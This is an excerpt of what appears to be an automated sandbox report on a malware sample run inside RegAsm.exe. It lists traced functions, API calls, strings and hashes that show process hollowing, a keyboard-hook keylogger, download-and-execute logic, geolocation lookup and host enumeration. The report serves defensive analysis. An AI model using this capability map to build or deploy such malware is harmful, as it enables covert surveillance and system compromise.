Instruction Fuzzy Hash: CD5166357003159FCB249A299800BAAFBEAFFC8310F28856AD945C7291DF71CCD1C7A2

Function 00810F50 Relevance: 6.4, Strings: 5, Instructions: 169COMMON

Download Yara Rule

Strings

h%f, xrefs: 008110FA
tPp, xrefs: 00810FD6
h%f, xrefs: 008110EC
tPp, xrefs: 00810FE2
89F, xrefs: 00810FBC

Memory Dump Source

Source File: 0000000C.00000002.453820611.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_810000_powershell.jbxd

Similarity

API ID:
String ID: 89F$h%f$h%f$tPp$tPp
API String ID: 0-1814265688
Opcode ID: 286032c350615080ef215f780918f77f0bd646c6efda11cc18fc5eb24c9174d4
Instruction ID: c8c51c020c8efd47c39a70404365c5017abdac614dccb3d8bc9f25a6ffa327a0
Opcode Fuzzy Hash: 286032c350615080ef215f780918f77f0bd646c6efda11cc18fc5eb24c9174d4
Instruction Fuzzy Hash: D9513D71B047959FCB204A69A814AAEFBA9FF89314F29847AD644CF241CE71CCC5C752

Function 008137C8 Relevance: 5.2, Strings: 4, Instructions: 184COMMON

Download Yara Rule

Strings

8#f, xrefs: 008139AA
h%f, xrefs: 008138DC
8#f, xrefs: 008139B8
h%f, xrefs: 008138CE

Memory Dump Source

Source File: 0000000C.00000002.453820611.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_810000_powershell.jbxd

Similarity

API ID:
String ID: 8#f$8#f$h%f$h%f
API String ID: 0-3516809857
Opcode ID: 95b7bf0c4cc8837d7e99935fd64394b45010f4e236d35918f5099f4b796f2d20
Instruction ID: a492ad630fad8c02430688566a5fca53dc080b11bbc1f37ac9bca7e8468704aa
Opcode Fuzzy Hash: 95b7bf0c4cc8837d7e99935fd64394b45010f4e236d35918f5099f4b796f2d20
Instruction Fuzzy Hash: 2D512771B043059FCB249B6998117AABFAAFFC6320F24807AE449DB245DA71DE81C791

Function 008118D0 Relevance: 5.1, Strings: 4, Instructions: 97COMMON

Download Yara Rule

Strings

X:F, xrefs: 00811917
4'p, xrefs: 0081196D
4'p, xrefs: 0081197D
X:F, xrefs: 00811934

Memory Dump Source

Source File: 0000000C.00000002.453820611.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_810000_powershell.jbxd

Similarity

API ID:
String ID: 4'p$4'p$X:F$X:F
API String ID: 0-1217803527
Opcode ID: 56d478e1705309dc7d476b74dbc9f040d01157f12468c5659d41d931da6b7a78
Instruction ID: 3f3da78048d1f1152c0c6dd4e9e9d4c03c8d56c40e43a208640722a7d56149fc
Opcode Fuzzy Hash: 56d478e1705309dc7d476b74dbc9f040d01157f12468c5659d41d931da6b7a78
Instruction Fuzzy Hash: 4321C5317043156BCB245A688464BBA7E9BFFC4711F64802AEA59CB380DEB2CC828351

Analysis Process: RegAsm.exePID: 3832, Parent PID: 3588COMMON

Execution Graph

Execution Coverage:	6.2%
Dynamic/Decrypted Code Coverage:	17.3%
Signature Coverage:	8.6%
Total number of Nodes:	1721
Total number of Limit Nodes:	45

Executed Functions

Function 0041CB50 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(Psapi), ref: 0041CB65
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB6E
GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB88
LoadLibraryA.KERNEL32(shcore), ref: 0041CB9A
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB9D
LoadLibraryA.KERNEL32(user32), ref: 0041CBAE
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBB1
LoadLibraryA.KERNEL32(ntdll), ref: 0041CBC3
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBC6
LoadLibraryA.KERNEL32(kernel32), ref: 0041CBD2
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBD5
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBE9
GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBFD
LoadLibraryA.KERNEL32(Shell32), ref: 0041CC0E
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC11
GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC25
GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC39
GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC4D
GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC61
GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC75
LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CC83
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC86
LoadLibraryA.KERNEL32(kernel32), ref: 0041CC97
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC9A
GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCAA
GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCBA
LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CCCC
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCCF
LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CCDC
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCDF
GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCF3
GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD07
LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD19
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD1C
LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD29
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD2C
LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD39
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD3C
LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD49
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD4C

Strings

shcore, xrefs: 0041CB95
Shell32, xrefs: 0041CC04
NtQueryInformationProcess, xrefs: 0041CCE1
GetComputerNameExW, xrefs: 0041CBEB
GlobalMemoryStatusEx, xrefs: 0041CBC8
RmEndSession, xrefs: 0041CD3E
Rstrtmgr, xrefs: 0041CD0E, 0041CD18, 0041CD23, 0041CD33, 0041CD43
Psapi, xrefs: 0041CB60
NtResumeProcess, xrefs: 0041CCAC
GetConsoleWindow, xrefs: 0041CC88
Shlwapi, xrefs: 0041CC79
ntdll, xrefs: 0041CBBD, 0041CBC2, 0041CCA1, 0041CCB1, 0041CCE6
NtSuspendProcess, xrefs: 0041CC9C
EnumDisplayDevicesW, xrefs: 0041CC27
kernel32, xrefs: 0041CBCD, 0041CBDC, 0041CBF0, 0041CC18, 0041CC68, 0041CC8D, 0041CCFA
SetProcessDpiAwareness, xrefs: 0041CB8F, 0041CB94, 0041CBA8
GetExtendedTcpTable, xrefs: 0041CCBC
SetProcessDEPPolicy, xrefs: 0041CC13
user32, xrefs: 0041CBA9, 0041CC2C, 0041CC40, 0041CC54
RmStartSession, xrefs: 0041CD09
GetFinalPathNameByHandleW, xrefs: 0041CCF5
RmRegisterResources, xrefs: 0041CD1E
IsUserAnAdmin, xrefs: 0041CBFF
GetSystemTimes, xrefs: 0041CC63
GetProcessImageFileNameW, xrefs: 0041CB5A, 0041CB5F, 0041CB7F
NtUnmapViewOfSection, xrefs: 0041CBB8
GetExtendedUdpTable, xrefs: 0041CCD1
Iphlpapi, xrefs: 0041CCC1, 0041CCCB, 0041CCD6
RmGetList, xrefs: 0041CD2E
GetMonitorInfoW, xrefs: 0041CC4F
EnumDisplayMonitors, xrefs: 0041CC3B
IsWow64Process, xrefs: 0041CBD7
Kernel32, xrefs: 0041CB80

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$HandleModule
String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
API String ID: 4236061018-3687161714
Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE

Function 004180EF Relevance: 59.8, APIs: 29, Strings: 5, Instructions: 289
nativelibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
GetProcAddress.KERNEL32(00000000), ref: 00418139
GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
GetProcAddress.KERNEL32(00000000), ref: 0041814D
GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
GetProcAddress.KERNEL32(00000000), ref: 00418161
GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
GetProcAddress.KERNEL32(00000000), ref: 00418175
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
GetThreadContext.KERNEL32(?,00000000), ref: 00418245
ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 00418293
NtUnmapViewOfSection.NTDLL(?,?), ref: 004182BB
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 004182DB
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 004182ED
NtClose.NTDLL(?), ref: 004182F7
TerminateProcess.KERNEL32(?,00000000), ref: 00418301
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
NtMapViewOfSection.NTDLL(?,00000000), ref: 0041834C
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
SetThreadContext.KERNEL32(?,00000000), ref: 00418428
ResumeThread.KERNEL32(?), ref: 00418435
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
GetCurrentProcess.KERNEL32(?), ref: 00418457
NtUnmapViewOfSection.NTDLL(00000000), ref: 0041845E
NtClose.NTDLL(?), ref: 00418468
TerminateProcess.KERNEL32(?,00000000), ref: 00418472
GetLastError.KERNEL32 ref: 0041847A

Strings

ntdll, xrefs: 00418121, 00418140, 00418154, 00418168
ZwMapViewOfSection, xrefs: 0041813B
ZwClose, xrefs: 00418163
ZwCreateSection, xrefs: 0041811C
ZwUnmapViewOfSection, xrefs: 0041814F

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmap$AllocErrorLastReadResumeWrite
String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
API String ID: 316982871-3035715614
Opcode ID: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
Opcode Fuzzy Hash: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A

Function 0040A2B8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
GetLastError.KERNEL32 ref: 0040A2ED

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

GetMessageA.USER32 ref: 0040A33B
TranslateMessage.USER32(?), ref: 0040A34A
DispatchMessageA.USER32 ref: 0040A355

Strings

Keylogger initialization failure: error , xrefs: 0040A301

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
String ID: Keylogger initialization failure: error
API String ID: 3219506041-952744263
Opcode ID: 718f47324b8862b268baf47dc1492ba3640dfc9c03fb41c98a70d8505363c975
Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
Opcode Fuzzy Hash: 718f47324b8862b268baf47dc1492ba3640dfc9c03fb41c98a70d8505363c975
Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA

Function 100010F1 Relevance: 12.1, APIs: 8, Instructions: 88
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
lstrcatW.KERNEL32(?,?), ref: 10001151
lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
FindClose.KERNEL32(00000000), ref: 100011DB

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: lstrlen$Find$File$CloseFirstNextlstrcat
String ID:
API String ID: 1083526818-0
Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6

Function 0041B380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
InternetCloseHandle.WININET(00000000), ref: 0041B41C
InternetCloseHandle.WININET(00000000), ref: 0041B41F

Strings

http://geoplugin.net/json.gp, xrefs: 0041B3B7

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$FileRead
String ID: http://geoplugin.net/json.gp
API String ID: 3121278467-91888290
Opcode ID: 961cfb38cd55e61572119c0efa1b6417dc8b0c9b1577fd71b4996ae3f28eea1b
Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
Opcode Fuzzy Hash: 961cfb38cd55e61572119c0efa1b6417dc8b0c9b1577fd71b4996ae3f28eea1b
Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA

Function 00411CFE Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2

SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
GetNativeSystemInfo.KERNEL32(?), ref: 00411DA5
SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411DC9

Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3

GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E10
HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E17
SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F2A

Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
Part of subcall function 00412077: HeapFree.KERNEL32(00000000), ref: 004120EE

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
String ID:
API String ID: 3950776272-0
Opcode ID: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
Opcode Fuzzy Hash: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9

Function 0040F7A7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00413549: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
Part of subcall function 00413549: RegQueryValueExA.KERNEL32 ref: 00413587
Part of subcall function 00413549: RegCloseKey.KERNEL32(?), ref: 00413592

Sleep.KERNEL32(00000BB8), ref: 0040F85B
ExitProcess.KERNEL32 ref: 0040F8CA

Strings

5.1.0 Pro, xrefs: 0040F836, 0040F8A3
override, xrefs: 0040F7CC
pth_unenc, xrefs: 0040F7BD, 0040F804, 0040F871

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseExitOpenProcessQuerySleepValue
String ID: 5.1.0 Pro$override$pth_unenc
API String ID: 2281282204-182549033
Opcode ID: b93807ab3ce0d5bba4bd1ccb9a8b41d40f094000d2685bb717fd1cbe92334c8f
Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
Opcode Fuzzy Hash: b93807ab3ce0d5bba4bd1ccb9a8b41d40f094000d2685bb717fd1cbe92334c8f
Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF

Function 00406EB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0

Strings

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 00407007, 0040712F
open, xrefs: 00406FB6

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DownloadExecuteFileShell
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
API String ID: 2825088817-3056885514
Opcode ID: c187f7693b0e0b8c76287a8c34956a26e343d16da2028282ac87543a3f6904de
Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
Opcode Fuzzy Hash: c187f7693b0e0b8c76287a8c34956a26e343d16da2028282ac87543a3f6904de
Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B

Function 0041B60D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GetComputerNameExW.KERNEL32(00000001,?,0000002B,8.v), ref: 0041B62A
GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642

Strings

8.v, xrefs: 0041B616

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Name$ComputerUser
String ID: 8.v
API String ID: 4229901323-1733865503
Opcode ID: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
Opcode Fuzzy Hash: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8

Function 00448957 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996

Strings

GetSystemTimePreciseAsFileTime, xrefs: 00448972

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Time$FileSystem
String ID: GetSystemTimePreciseAsFileTime
API String ID: 2086374402-595813830
Opcode ID: ec0f4eb119bfc3d52cbbcb4ffab675a518ff64a6f359a61470016f4626938150
Instruction ID: 0ece642104574987c61f359f6ab52f67772cb5eafdc88f944851b8b866d171c2
Opcode Fuzzy Hash: ec0f4eb119bfc3d52cbbcb4ffab675a518ff64a6f359a61470016f4626938150
Instruction Fuzzy Hash: 55E0E571A41718E7D710AB259C02E7EBB54DB44B02B10027EFC0957382DE285D0496DE

Function 00434B47 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00434B4C

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
Instruction Fuzzy Hash:

Function 0040E9C5 Relevance: 63.8, APIs: 15, Strings: 21, Instructions: 795
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Psapi), ref: 0041CB65
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB6E
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB88
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore), ref: 0041CB9A
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB9D
